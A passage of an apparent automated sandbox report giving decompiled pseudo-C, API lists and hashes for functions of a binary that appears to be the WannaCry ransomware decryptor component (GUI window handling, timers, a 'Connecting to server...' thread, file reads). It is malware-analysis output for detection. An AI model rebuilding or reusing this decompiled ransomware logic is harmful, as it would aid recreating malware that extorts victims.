                                                      										L30:
                                                      										 *((intOrPtr*)(_t257 + 0x494)) = 0xffffffff;
                                                      										_t71 = E0040C860(_t257 + 0x20, _t257 + 0x3c,  *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x18)))),  *((intOrPtr*)(_t257 + 0x18)));
                                                      										_push( *((intOrPtr*)(_t257 + 0x18)));
                                                      										L00412C98();
                                                      										_t252 = _t257 + 4;
                                                      										goto L31;
                                                      									} else {
                                                      										do {
                                                      											_t191 = rand() % _t86;
                                                      											_t250 =  *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x18))));
                                                      											__eflags = _t191;
                                                      											_t91 = _t191;
                                                      											if(_t191 > 0) {
                                                      												_t91 = 0;
                                                      												__eflags = 0;
                                                      												do {
                                                      													_t250 =  *_t250;
                                                      													_t191 = _t191 - 1;
                                                      													__eflags = _t191;
                                                      												} while (_t191 != 0);
                                                      											}
                                                      											__eflags = _t91;
                                                      											if(_t91 < 0) {
                                                      												_t110 =  ~_t91;
                                                      												do {
                                                      													_t250 =  *((intOrPtr*)(_t250 + 4));
                                                      													_t110 = _t110 - 1;
                                                      													__eflags = _t110;
                                                      												} while (_t110 != 0);
                                                      											}
                                                      											_t92 =  *(_t250 + 0xc);
                                                      											_t42 = _t250 + 8; // 0x8
                                                      											_t126 = _t42;
                                                      											__eflags = _t92;
                                                      											if(__eflags == 0) {
                                                      												_t92 = 0x41ba38;
                                                      											}
                                                      											asm("repne scasb");
                                                      											_t152 =  !(_t147 | 0xffffffff);
                                                      											_t240 = _t92 - _t152;
                                                      											_t153 = _t152 >> 2;
                                                      											memcpy(_t240 + _t153 + _t153, _t240, memcpy(_t257 + 0x40, _t240, _t153 << 2) & 0x00000003);
                                                      											_t259 = _t257 + 0x18;
                                                      											_t158 = _t259 + 0x40;
                                                      											_push(_t158);
                                                      											_t97 = E0040BA60(__eflags);
                                                      											_t260 = _t259 + 4;
                                                      											__eflags = _t97;
                                                      											if(_t97 == 0) {
                                                      												 *((intOrPtr*)(_t260 + 0x494)) = 0xffffffff;
                                                      												asm("repne scasb");
                                                      												_t160 =  !(_t158 | 0xffffffff);
                                                      												_t241 = _t260 + 0x40 - _t160;
                                                      												_t161 = _t160 >> 2;
                                                      												memcpy(0x422214, _t241, _t161 << 2);
                                                      												memcpy(_t241 + _t161 + _t161, _t241, _t160 & 0x00000003);
                                                      												_t262 = _t260 + 0x18;
                                                      												_t242 =  *((intOrPtr*)(_t262 + 0x18));
                                                      												_t101 =  *_t242;
                                                      												__eflags = _t101 - _t242;
                                                      												 *((intOrPtr*)(_t262 + 0x20)) = _t101;
                                                      												if(_t101 != _t242) {
                                                      													do {
                                                      														_push(0);
                                                      														E0040C740(_t262 + 0x1c, _t262 + 0x3c,  *((intOrPtr*)(E00402D90(_t262 + 0x28, _t262 + 0x38))));
                                                      														__eflags =  *((intOrPtr*)(_t262 + 0x20)) - _t242;
                                                      													} while ( *((intOrPtr*)(_t262 + 0x20)) != _t242);
                                                      												}
                                                      												_push( *((intOrPtr*)(_t262 + 0x18)));
                                                      												L00412C98();
                                                      												_t252 = _t262 + 4;
                                                      												_t72 = 0;
                                                      											} else {
                                                      												goto L29;
                                                      											}
                                                      											goto L32;
                                                      											L29:
                                                      											_t169 =  *0x422210; // 0xb828e8
                                                      											 *((intOrPtr*)( *_t169 + 0xc))();
                                                      											 *((intOrPtr*)( *((intOrPtr*)(_t250 + 4)))) =  *_t250;
                                                      											_t147 = _t126;
                                                      											 *((intOrPtr*)( *_t250 + 4)) =  *((intOrPtr*)(_t250 + 4));
                                                      											E0040CE50(_t147, 0);
                                                      											_push(_t250);
                                                      											L00412C98();
                                                      											_t257 = _t260 + 4;
                                                      											 *((intOrPtr*)(_t257 + 0x20)) =  *((intOrPtr*)(_t260 + 0x20)) - 1;
                                                      											Sleep(0xbb8); // executed
                                                      											_t86 =  *(_t257 + 0x1c);
                                                      											__eflags = _t86;
                                                      										} while (_t86 > 0);
                                                      										goto L30;
                                                      									}
                                                      								} else {
                                                      									goto L17;
                                                      								}
                                                      								goto L32;
                                                      							}
                                                      							asm("sbb eax, eax");
                                                      							asm("sbb eax, 0xffffffff");
                                                      							goto L16;
                                                      						}
                                                      					} else {
                                                      						_push(0x422214);
                                                      						_t72 = E0040BA60(_t266);
                                                      						_t252 = _t252 + 4;
                                                      						if(_t72 != 0) {
                                                      							goto L3;
                                                      						}
                                                      					}
                                                      				}
                                                      				L32:
                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t252 + 0x48c));
                                                      				return _t72;
                                                      			}
                                                      0x0040bcb3
                                                      0x0040bcb3
                                                      0x0040bcb7
                                                      0x0040bcc5
                                                      0x0040bcc5
                                                      0x0040bcd3
                                                      0x0040bcdc
                                                      0x0040bcdd
                                                      0x0040bce2
                                                      0x0040bce5
                                                      0x0040bce5
                                                      0x0040bc41
                                                      0x0040bc41
                                                      0x0040bc48
                                                      0x0040bc4d
                                                      0x0040bc4d
                                                      0x0040bc51
                                                      0x0040bc55
                                                      0x00000000
                                                      0x00000000
                                                      0x0040bc59
                                                      0x0040bc71
                                                      0x0040bc71
                                                      0x0040bc5b
                                                      0x0040bc5b
                                                      0x0040bc5b
                                                      0x0040bc61
                                                      0x0040bc65
                                                      0x00000000
                                                      0x0040bc67
                                                      0x0040bc67
                                                      0x0040bc6a
                                                      0x0040bc6f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040bc6f
                                                      0x0040bc65
                                                      0x0040bc7a
                                                      0x0040bc7a
                                                      0x0040bc7c
                                                      0x0040bcec
                                                      0x0040bcf3
                                                      0x0040bcf8
                                                      0x0040bcfc
                                                      0x0040bcff
                                                      0x0040bd01
                                                      0x0040bdc7
                                                      0x0040bdcb
                                                      0x0040bde3
                                                      0x0040bdec
                                                      0x0040bded
                                                      0x0040bdf2
                                                      0x00000000
                                                      0x0040bd07
                                                      0x0040bd07
                                                      0x0040bd10
                                                      0x0040bd16
                                                      0x0040bd18
                                                      0x0040bd1a
                                                      0x0040bd1c
                                                      0x0040bd1e
                                                      0x0040bd1e
                                                      0x0040bd20
                                                      0x0040bd20
                                                      0x0040bd23
                                                      0x0040bd23
                                                      0x0040bd23
                                                      0x0040bd20
                                                      0x0040bd26
                                                      0x0040bd28
                                                      0x0040bd2a
                                                      0x0040bd2c
                                                      0x0040bd2c
                                                      0x0040bd2f
                                                      0x0040bd2f
                                                      0x0040bd2f
                                                      0x0040bd2c
                                                      0x0040bd32
                                                      0x0040bd35
                                                      0x0040bd35
                                                      0x0040bd38
                                                      0x0040bd3a
                                                      0x0040bd3c
                                                      0x0040bd3c
                                                      0x0040bd4c
                                                      0x0040bd4e
                                                      0x0040bd54
                                                      0x0040bd58
                                                      0x0040bd62
                                                      0x0040bd62
                                                      0x0040bd64
                                                      0x0040bd68
                                                      0x0040bd69
                                                      0x0040bd6e
                                                      0x0040bd71
                                                      0x0040bd73
                                                      0x0040be1a
                                                      0x0040be25
                                                      0x0040be27
                                                      0x0040be2d
                                                      0x0040be34
                                                      0x0040be37
                                                      0x0040be3e
                                                      0x0040be3e
                                                      0x0040be40
                                                      0x0040be44
                                                      0x0040be46
                                                      0x0040be48
                                                      0x0040be4c
                                                      0x0040be4e
                                                      0x0040be52
                                                      0x0040be6a
                                                      0x0040be6f
                                                      0x0040be6f
                                                      0x0040be4e
                                                      0x0040be79
                                                      0x0040be7a
                                                      0x0040be7f
                                                      0x0040be82
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040bd79
                                                      0x0040bd79
                                                      0x0040bd81
                                                      0x0040bd8c
                                                      0x0040bd94
                                                      0x0040bd96
                                                      0x0040bd99
                                                      0x0040bd9e
                                                      0x0040bd9f
                                                      0x0040bda8
                                                      0x0040bdb1
                                                      0x0040bdb5
                                                      0x0040bdbb
                                                      0x0040bdbf
                                                      0x0040bdbf
                                                      0x00000000
                                                      0x0040bd07
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040bc7c
                                                      0x0040bc75
                                                      0x0040bc77
                                                      0x00000000
                                                      0x0040bc77
                                                      0x0040bb38
                                                      0x0040bb38
                                                      0x0040bb3d
                                                      0x0040bb42
                                                      0x0040bb47
                                                      0x00000000
                                                      0x00000000
                                                      0x0040bb47
                                                      0x0040bb36
                                                      0x0040bdf8
                                                      0x0040be03
                                                      0x0040be10

                                                      APIs
                                                      • strtok.MSVCRT ref: 0040BBA9
                                                      • strtok.MSVCRT ref: 0040BC22
                                                      • #825.MFC42(?,?), ref: 0040BCDD
                                                      • GetTickCount.KERNEL32 ref: 0040BCEC
                                                      • srand.MSVCRT ref: 0040BCF3
                                                      • rand.MSVCRT ref: 0040BD09
                                                      • #825.MFC42(00000000,00000000,?,?,?,00000000,00000000), ref: 0040BD9F
                                                      • Sleep.KERNELBASE(00000BB8,00000000,?,?,?,00000000,00000000), ref: 0040BDB5
                                                      • #825.MFC42(?,?,?,?), ref: 0040BDED
                                                        • Part of subcall function 0040C860: #825.MFC42(?,00000000,0019FA30,00422214,00000000,0040BDE8,?,?,?), ref: 0040C8B5
                                                      • #825.MFC42(?), ref: 0040BE7A
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #825$strtok$CountSleepTickrandsrand
                                                      • String ID:
                                                      • API String ID: 1749417438-0
                                                      • Opcode ID: 96e699f875d8ec980aa85d24ffdf4feb71e75c823abe6f95846dbf914e7e69aa
                                                      • Instruction ID: 15ce6157e9eadcb8372a8ba3d428bceb52ebc69e02ab62c17c692bc1e2f98a80
                                                      • Opcode Fuzzy Hash: 96e699f875d8ec980aa85d24ffdf4feb71e75c823abe6f95846dbf914e7e69aa
                                                      • Instruction Fuzzy Hash: 48A102716082059BC724DF34C841AABB7D4EF95314F044A3EF99AA73D1EB78D908C79A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 83%
                                                      			E004085C0(intOrPtr __ecx) {
                                                      				char _v4;
                                                      				intOrPtr _v16;
                                                      				long _v20;
                                                      				void _v24;
                                                      				intOrPtr _v28;
                                                      				int _t33;
                                                      				intOrPtr _t50;
                                                      				long _t53;
                                                      				intOrPtr _t55;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413FF3);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t55;
                                                      				_t50 = __ecx;
                                                      				_v16 = __ecx;
                                                      				L00412C8C();
                                                      				 *((intOrPtr*)(__ecx)) = 0x4157f0;
                                                      				_v4 = 0;
                                                      				L00412F74();
                                                      				 *((intOrPtr*)(__ecx + 0x74)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x78)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x7c)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x80)) = 0;
                                                      				_v4 = 1;
                                                      				 *((intOrPtr*)(__ecx)) = 0x4161a4;
                                                      				 *((intOrPtr*)(_t50 + 0x58)) = GetSysColor(0xf);
                                                      				 *((intOrPtr*)(_t50 + 0x60)) = GetSysColor(9);
                                                      				 *((intOrPtr*)(_t50 + 0x64)) = GetSysColor(0x12);
                                                      				_t53 = GetSysColor(2);
                                                      				_v20 = _t53;
                                                      				_v24 = 0;
                                                      				_t33 = SystemParametersInfoA(0x1008, 0,  &_v24, 0); // executed
                                                      				if(_t33 != 0 && _v24 != 0) {
                                                      					_t53 = GetSysColor(0x1b);
                                                      				}
                                                      				_push(0xffffffff);
                                                      				_push(2);
                                                      				L00412F50();
                                                      				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x44)))) = _v28;
                                                      				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x44)) + 4)) = _t53;
                                                      				 *((intOrPtr*)(_t50 + 0x70)) = 0xa;
                                                      				 *((intOrPtr*)(_t50 + 0x68)) = 0;
                                                      				 *((intOrPtr*)(_t50 + 0x6c)) = 0x28;
                                                      				 *((intOrPtr*)(_t50 + 0x54)) = 0;
                                                      				 *((intOrPtr*)(_t50 + 0x5c)) = 0;
                                                      				 *[fs:0x0] = _v20;
                                                      				return _t50;
                                                      			}

                                                      APIs
                                                      • #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
                                                      • #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
                                                      • GetSysColor.USER32 ref: 0040861D
                                                      • GetSysColor.USER32(00000009), ref: 00408624
                                                      • GetSysColor.USER32(00000012), ref: 0040862B
                                                      • GetSysColor.USER32(00000002), ref: 00408632
                                                      • KiUserCallbackDispatcher.NTDLL(00001008,00000000,00000000,00000000), ref: 0040864A
                                                      • GetSysColor.USER32(0000001B), ref: 0040865C
                                                      • #6140.MFC42(00000002,000000FF), ref: 00408667
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Color$#341#567#6140CallbackDispatcherUser
                                                      • String ID:
                                                      • API String ID: 2603677082-0
                                                      • Opcode ID: 51668d6117463ada0c326ac575935f99ab198cb4b06a73068adc63a74b909c1d
                                                      • Instruction ID: 8505b43e8b24dba0e9a20122b4cf5018a120a2575fdff98832e5101b57525ea5
                                                      • Opcode Fuzzy Hash: 51668d6117463ada0c326ac575935f99ab198cb4b06a73068adc63a74b909c1d
                                                      • Instruction Fuzzy Hash: 7D2159B0900B449FD320DF2AC985B96FBE4FF84B14F504A2FE19687791D7B9A844CB85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0040B620(WCHAR* _a4, struct HWND__* _a8) {
                                                      				struct HWND__* _t4;
                                                      				struct HWND__* _t15;
                                                      
                                                      				_t4 = FindWindowW(0, _a4); // executed
                                                      				_t15 = _t4;
                                                      				if(_t15 != 0) {
                                                      					ShowWindow(_t15, 5); // executed
                                                      					SetWindowPos(_t15, 0xffffffff, 0, 0, 0, 0, 0x43);
                                                      					SetWindowPos(_t15, 0xfffffffe, 0, 0, 0, 0, 0x43);
                                                      					SetForegroundWindow(_t15); // executed
                                                      					SetFocus(_t15);
                                                      					SetActiveWindow(_t15);
                                                      					BringWindowToTop(_t15);
                                                      					_t4 = _a8;
                                                      					if(_t4 != 0) {
                                                      						ExitProcess(0);
                                                      					}
                                                      				}
                                                      				return _t4;
                                                      			}

                                                      APIs
                                                      • FindWindowW.USER32(00000000,00000000), ref: 0040B628
                                                      • ShowWindow.USER32(00000000,00000005,00000000,?,00000000), ref: 0040B638
                                                      • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B651
                                                      • SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B660
                                                      • KiUserCallbackDispatcher.NTDLL(00000000), ref: 0040B663
                                                      • SetFocus.USER32(00000000,?,00000000), ref: 0040B66A
                                                      • SetActiveWindow.USER32(00000000,?,00000000), ref: 0040B671
                                                      • BringWindowToTop.USER32(00000000), ref: 0040B678
                                                      • ExitProcess.KERNEL32 ref: 0040B689
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Window$ActiveBringCallbackDispatcherExitFindFocusProcessShowUser
                                                      • String ID:
                                                      • API String ID: 3379167612-0
                                                      • Opcode ID: ec9fc34e90d3c79d5292e19d7f02050e94f93b43ef6df305d89d1d3c5b01f4c1
                                                      • Instruction ID: 32f88169c1f0d7c0e12a36757c7a64a26434f73f58f3758d5628eaed19e7f987
                                                      • Opcode Fuzzy Hash: ec9fc34e90d3c79d5292e19d7f02050e94f93b43ef6df305d89d1d3c5b01f4c1
                                                      • Instruction Fuzzy Hash: 66F0F431245A21F7E2315B54AC0DFDF3655DFC5B21F214610F715791D4CB6455018AAD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 92%
                                                      			E00401140() {
                                                      				intOrPtr _v4;
                                                      				void* _t16;
                                                      				void* _t17;
                                                      				struct HWND__* _t18;
                                                      				void* _t23;
                                                      				intOrPtr _t24;
                                                      
                                                      				_t23 = _t17;
                                                      				L00412CB0();
                                                      				SendMessageA( *(_t23 + 0x80), 0x404, 1, 0);
                                                      				_t18 =  *(_t23 + 0x80);
                                                      				SendMessageA(_t18, 0x401, 0, 0x280000);
                                                      				_push(_t18);
                                                      				 *((intOrPtr*)(_t23 + 0xb0)) = 0x1e;
                                                      				_v4 = _t24;
                                                      				L00412CAA();
                                                      				E00401970("Connecting to server...");
                                                      				 *(_t23 + 0xa8) = 0;
                                                      				SetTimer( *(_t23 + 0x20), 0x3e9, 0x3e8, 0); // executed
                                                      				if( *((intOrPtr*)(_t23 + 0xa0)) != 0) {
                                                      					_t16 = CreateThread(0, 0, E004012D0, _t23, 0, 0); // executed
                                                      					 *(_t23 + 0xac) = _t16;
                                                      				}
                                                      				return 1;
                                                      			}










                                                      APIs
                                                      • #4710.MFC42 ref: 00401145
                                                      • SendMessageA.USER32(?,00000404,00000001,00000000), ref: 00401160
                                                      • SendMessageA.USER32(?,00000401,00000000,00280000), ref: 00401175
                                                      • #537.MFC42(Connecting to server...), ref: 0040118D
                                                        • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
                                                        • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
                                                        • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
                                                      • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004011B3
                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_000012D0,?,00000000,00000000), ref: 004011D1
                                                      Strings
                                                      • Connecting to server..., xrefs: 00401188
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#3092#4710#537#6199#800CreateThreadTimer
                                                      • String ID: Connecting to server...
                                                      • API String ID: 3305248171-1849848738
                                                      • Opcode ID: aade00bc90c5f3efc1f806a2182fbe742cea5c73be26a938389ce35b89292200
                                                      • Instruction ID: 074e0af6858d04fd3a88c2e6ba563778cf6a67133e9310fa302bc50ac74eac6c
                                                      • Opcode Fuzzy Hash: aade00bc90c5f3efc1f806a2182fbe742cea5c73be26a938389ce35b89292200
                                                      • Instruction Fuzzy Hash: 480175B0390700BBE2305B66CC46F8BB694AF84B50F10851EF349AA2D0CAF474018B99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00401220(void* __ecx, long _a4) {
                                                      				long _t11;
                                                      				void* _t26;
                                                      
                                                      				_t11 = _a4;
                                                      				_t26 = __ecx;
                                                      				if(_t11 != 0x3e9) {
                                                      					L8:
                                                      					L00412CBC();
                                                      					return _t11;
                                                      				}
                                                      				if( *((intOrPtr*)(__ecx + 0xa8)) != 0) {
                                                      					SendMessageA( *(__ecx + 0x80), 0x402, 0x28, 0);
                                                      					KillTimer( *(_t26 + 0x20), 0x3e9);
                                                      					L00412B66();
                                                      				}
                                                      				if(SendMessageA( *(_t26 + 0x80), 0x408, 0, 0) <  *((intOrPtr*)(_t26 + 0xb0))) {
                                                      					SendMessageA( *(_t26 + 0x80), 0x405, 0, 0); // executed
                                                      				}
                                                      				_t11 =  *(_t26 + 0xa0);
                                                      				if(_t11 == 0) {
                                                      					_t11 = SendMessageA( *(_t26 + 0x80), 0x408, 0, 0);
                                                      					if(_t11 == 0xf) {
                                                      						 *((intOrPtr*)(_t26 + 0xa8)) = 0xffffffff;
                                                      					}
                                                      				}
                                                      				goto L8;
                                                      			}






                                                      APIs
                                                      • SendMessageA.USER32(?,00000402,00000028,00000000), ref: 00401253
                                                      • KillTimer.USER32(?,000003E9), ref: 0040125E
                                                      • #4853.MFC42 ref: 00401266
                                                      • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 0040127B
                                                      • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00401295
                                                      • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 004012B1
                                                      • #2379.MFC42 ref: 004012C4
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#2379#4853KillTimer
                                                      • String ID:
                                                      • API String ID: 178170520-0
                                                      • Opcode ID: b77cb0015e8fab117b1368574dbf11fadefe02a27d4ed6d688f80b57d7754396
                                                      • Instruction ID: aacaf11b8525f3fa08346ebc997e4185e7a595c9bc7dc659aa73715d177cc548
                                                      • Opcode Fuzzy Hash: b77cb0015e8fab117b1368574dbf11fadefe02a27d4ed6d688f80b57d7754396
                                                      • Instruction Fuzzy Hash: FD114475340B00ABD6709A74CD41F6BB3D4BB94B10F20892DF395FB2D0DAB4B8068B58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: fclose$fopenfreadfwrite
                                                      • String ID: c.wnry
                                                      • API String ID: 2140422903-3240288721
                                                      • Opcode ID: 6e9b76c3277035fe504f344658f288149f4646c70a2b683330cc54d29e3cf444
                                                      • Instruction ID: f5186b7865cb40674a519f70d39de74d6a09c830656aa5640d665e45194f203f
                                                      • Opcode Fuzzy Hash: 6e9b76c3277035fe504f344658f288149f4646c70a2b683330cc54d29e3cf444
                                                      • Instruction Fuzzy Hash: 0DF0FC31746310EBD3209B19BD09BD77A56DFC0721F450436FC0ED63A4E2799946899E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 71%
                                                      			E00406CF0(void* __ecx, intOrPtr _a4) {
                                                      				int _v12;
                                                      				intOrPtr _v20;
                                                      				void* _v28;
                                                      				char _v36;
                                                      				intOrPtr _v40;
                                                      				void* _v48;
                                                      				struct HWND__* _t16;
                                                      				void* _t21;
                                                      				void* _t34;
                                                      				intOrPtr _t36;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413E78);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t36;
                                                      				_t34 = __ecx;
                                                      				_t16 = __ecx + 0x4c0;
                                                      				if(_t16 != 0) {
                                                      					_t16 =  *(_t16 + 0x20);
                                                      				}
                                                      				SendMessageA(_t16, 0x445, 0, 0x4000000);
                                                      				_push(0);
                                                      				_push(_a4);
                                                      				L00412F44(); // executed
                                                      				_v12 = 0;
                                                      				_v48 =  &_v36;
                                                      				_v40 = E00406DA0;
                                                      				SendMessageA( *(_t34 + 0x4e0), 0x449, 2,  &_v48); // executed
                                                      				L00412F3E();
                                                      				_t21 = E00406DC0(_t34);
                                                      				_v12 = 0xffffffff;
                                                      				L00412F38();
                                                      				 *[fs:0x0] = _v20;
                                                      				return _t21;
                                                      			}














                                                      APIs
                                                      • SendMessageA.USER32(?,00000445,00000000,04000000), ref: 00406D2C
                                                      • #353.MFC42(?,00000000,?,?,?,?,?,?,?,?,?,?,767B20C0), ref: 00406D39
                                                      • SendMessageA.USER32 ref: 00406D69
                                                      • #1979.MFC42 ref: 00406D6F
                                                      • #665.MFC42 ref: 00406D87
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#1979#353#665
                                                      • String ID:
                                                      • API String ID: 3794212480-0
                                                      • Opcode ID: 3e8137c70926b1d8ee173e5193f7a8fccbc7f675bb9cd6243914618cf2aa9b36
                                                      • Instruction ID: 970bbd2b9484f858b006173e4a833a93101fbe0026f1fdcd253c6fb41473c1ec
                                                      • Opcode Fuzzy Hash: 3e8137c70926b1d8ee173e5193f7a8fccbc7f675bb9cd6243914618cf2aa9b36
                                                      • Instruction Fuzzy Hash: EA1170B1244701AFD210EF15C942F9BB7E4BF94B14F504A1EF156A72C0C7B8A905CB5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E00407DB0(void* __eflags) {
                                                      				intOrPtr _v4;
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr _v28;
                                                      				intOrPtr _v32;
                                                      				intOrPtr _v36;
                                                      				void* _v100;
                                                      				char _v196;
                                                      				void* _t14;
                                                      				intOrPtr _t16;
                                                      				intOrPtr _t22;
                                                      				void* _t23;
                                                      				intOrPtr* _t24;
                                                      				intOrPtr _t26;
                                                      				void* _t28;
                                                      
                                                      				 *[fs:0x0] = _t26;
